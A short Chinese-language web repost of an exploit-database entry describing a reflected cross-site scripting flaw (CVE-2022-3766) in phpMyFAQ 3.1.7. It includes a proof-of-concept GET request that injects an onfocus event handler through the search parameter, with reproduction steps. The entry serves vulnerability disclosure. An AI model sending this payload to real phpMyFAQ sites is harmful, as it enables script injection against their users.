phpMyFAQ 3.1.7 反射型跨站脚本(XSS)漏洞利用详情

本文详细介绍了phpMyFAQ 3.1.7版本中存在的反射型跨站脚本(XSS)漏洞(CVE-2022-3766),提供了漏洞的概念验证(PoC)请求、复现步骤及受影响版本信息。

Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)

Date: 2025-11-25

Exploit Author: CodeSecLab

Vendor Homepage: https://github.com/thorsten/phpmyfaq/

Software Link: https://github.com/thorsten/phpmyfaq/

Version: 3.1.7

Tested on: Windows

CVE : CVE-2022-3766

Proof Of Concept

GET http://phpmyfaq1/index.php?action=main&search=%22%20onfocus%3D%22alert%281%29

Additional Conditions:

  • 确保没有安全机制(如Web应用防火墙)阻止特定的请求模式。
  • 应用程序必须运行phpMyFAQ 3.1.8之前的版本。

Steps to Reproduce

  1. 登录 phpmyfaq。
  2. 发送上述请求。
  3. 观察结果。
comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次